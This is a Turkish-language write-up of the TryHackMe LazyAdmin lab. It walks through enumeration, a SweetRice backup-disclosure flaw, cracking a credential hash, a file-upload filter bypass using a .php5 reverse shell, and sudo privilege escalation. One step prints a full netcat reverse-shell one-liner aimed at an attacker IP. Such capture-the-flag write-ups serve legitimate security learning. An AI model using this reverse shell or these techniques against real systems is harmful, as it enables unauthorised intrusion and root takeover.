1 minute read

Selamlar bu yazımda TryHackMe’de bulunan LayzAdmin makinesinin çözümünden bahsedeceğim. Umarım öğretici bir yazı olur, keyifli okumalar.

Nmap

image-center

Dirb ile hidden directory tespit etmeye çalıştığımda content ve content/as isimli iki adet dizini tespit ettim.

image-center

hedefIP/content sayfasını ziyaret ettiğimde management system olarak SweetRice kullanıldığı görüntülenmektedir.

image-center

SweetRice hakkında zafiyet araştırması yapıldığında ise birden fazla çıktı görüntülenmektedir.

image-center

SweetRice 1.5.1 - Backup Disclosure zafiyeti “http://localhost/inc/mysql_backup” end pointinde yedeklerin disclosure olduğunu gördüm.

image-center

Backup dosyası içerisinde bir kullanıcı adı ve hashlenmiş haldeki parolayı buldum. Hash’i CrackStation kullanarak kırdığımda parolaya ulaştım.

image-center

/content/as sayfası SweetRice’ın login sayfasıdır. Elde edilen kimlik bilgileri ile giriş yapıldıktan sonra potansiyel güvenlik zafiyetleri araştırılmaktadır. Tema sekmesinde reverse shell include edilerek hedef sistemde erişim hedeflenmektedir.

image-center

Fakat yüklenilen dosyaya erişilememektedir. Bu yüzden farklı bir giriş noktası olan MediaCenter sekmesi ziyaret edilmektedir.

image-center

.php uzantılı shell yüklendiğinde sistem kabul etmemektedir fakat .php5 olarak uzantısı değiştirip yüklendiğinde sistem kabul etmektedir. Saldırı makinesinde ilgili port dinlenerek exploit tetiklenmektedir.

image-center

User.txt

image-center

Yetki yükseltmek için “sudo -l” yapıldığında perl ve backup.pl dosyalarının super user yetkileri ile çalışabildiği görüntülenmektedir. Ek olarak SUID bitleri incelendiğinde herhangi bir şey tespit edilememektedir.

backup.pl dosyası /etc/copy.sh dosyasını yürütmektedir.

image-center

copy.sh dosyası incelendiğinde ise dosya üzerinde değişiklik yapabilme (yazma) yetkisine sahip olunduğu gözlemlenmektedir.

image-center

copy.sh dosyasının içeriğini “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1 nc 10.9.63.80 1235 >/tmp/f” ile değiştirilmektedir.

image-center

“sudo -l” çıktısında görüntülenen backup.pl dosyası super user yetkileriyle çalışmaktadır ve içeriği değiştirilen, root yetkilerine erişmeye yardımcı dosyayı çalıştırmaktadır. İlgili port dinlenerek backup.pl dosyası çalıştırılmaktadır.

image-center

Sonuç olarak yetki yükseltme gerçekleşmektedir ve root.txt dosyasının içeriği elde edilmektedir.

image-center